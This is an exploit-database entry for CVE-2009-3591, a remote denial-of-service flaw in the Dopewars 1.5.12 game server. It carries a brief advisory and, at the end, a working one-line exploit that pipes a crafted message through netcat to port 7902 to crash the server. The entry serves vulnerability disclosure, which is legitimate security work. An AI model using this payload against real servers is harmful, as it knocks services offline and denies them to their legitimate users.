Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service



EKU-ID: 38126 CVE: CVE-2009-3591;OSVDB-58884 OSVDB-ID:
Author: Doug Prostko Published: 2009-10-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/36606/info

Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects Dopewars 1.5.12; other versions may also be affected.

The following exploit is available:

ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902